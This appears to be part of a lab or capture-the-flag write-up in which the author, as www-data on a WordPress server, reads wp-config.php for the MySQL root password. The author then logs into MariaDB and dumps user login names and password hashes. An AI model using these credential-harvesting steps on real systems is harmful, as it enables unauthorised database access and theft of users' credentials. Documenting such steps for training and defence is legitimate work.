Database Credential
Checking for DB credential after performing a manual system enumeration
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog$ ll
total 208K
4.0K drwxr-xr-x 5 www-data root 4.0K Aug 19 2022 .
4.0K drwxr-xr-x 6 www-data root 4.0K Jan 17 2021 wp-content
4.0K -rw-r--r-- 1 www-data www-data 35 Jan 17 2021 .htaccess
4.0K drwxr-xr-x 3 root root 4.0K Jan 17 2021 ..
12K drwxr-xr-x 18 www-data root 12K Jan 17 2021 wp-includes
4.0K -rw-r--r-- 1 www-data root 2.4K Jan 17 2021 wp-links-opml.php
4.0K -rw-r--r-- 1 www-data root 3.3K Jan 17 2021 wp-load.php
40K -rw-r--r-- 1 www-data root 37K Jan 17 2021 wp-login.php
8.0K -rw-r--r-- 1 www-data root 7.9K Jan 17 2021 wp-mail.php
16K -rw-r--r-- 1 www-data root 16K Jan 17 2021 wp-settings.php
32K -rw-r--r-- 1 www-data root 30K Jan 17 2021 wp-signup.php
8.0K -rw-r--r-- 1 www-data root 4.6K Jan 17 2021 wp-trackback.php
4.0K -rw-r--r-- 1 www-data root 3.0K Jan 17 2021 xmlrpc.php
4.0K -rw-r--r-- 1 www-data root 3.6K Jan 17 2021 wp-cron.php
4.0K -rw-r--r-- 1 www-data root 2.8K Jan 17 2021 wp-config-sample.php
4.0K drwxr-xr-x 9 www-data root 4.0K Jan 17 2021 wp-admin
4.0K -rw-r--r-- 1 www-data root 364 Jan 17 2021 wp-blog-header.php
4.0K -rw-r--r-- 1 www-data root 1.9K Jan 17 2021 wp-comments-post.php
4.0K -rw-r--r-- 1 www-data root 2.9K Jan 17 2021 wp-config.php
4.0K -rw-r--r-- 1 www-data root 418 Jan 17 2021 index.php
20K -rw-r--r-- 1 www-data root 20K Jan 17 2021 license.txt
8.0K -rw-r--r-- 1 www-data root 7.3K Jan 17 2021 readme.html
8.0K -rw-r--r-- 1 www-data root 5.4K Jan 17 2021 wp-activate.phpwp-config.php
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog$ cat wp-config.php
<?php
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');
/** MySQL database username */
define('DB_USER', 'root');
/** MySQL database password */
define('DB_PASSWORD', 'sup3r_s3cr3t');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
[...REDACTED...]DB credential located; root:sup3r_s3cr3t
This was also flagged by PEAS earlier
MySQL
www-data@ubuntu-xenial:/var/www/wordpress/assets/fonts/blog$ mysql -uroot -psup3r_s3cr3t
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 18985
Server version: 10.0.38-MariaDB-0ubuntu0.16.04.1 Ubuntu 16.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> Session established
MariaDB [(none)]> SELSELECT user_login,user_pass FROM wordpress.wp_users;
SELECT user_login,user_pass FROM wordpress.wp_users;
+------------+------------------------------------+
| user_login | user_pass |
+------------+------------------------------------+
| j@m3s | $P$BqG2S/yf1TNEu03lHunJLawBEzKQZv/ |
+------------+------------------------------------+
1 row in set (0.00 sec)Credential hash exfiltrated; $P$BqG2S/yf1TNEu03lHunJLawBEzKQZv/
Unable to crack the hash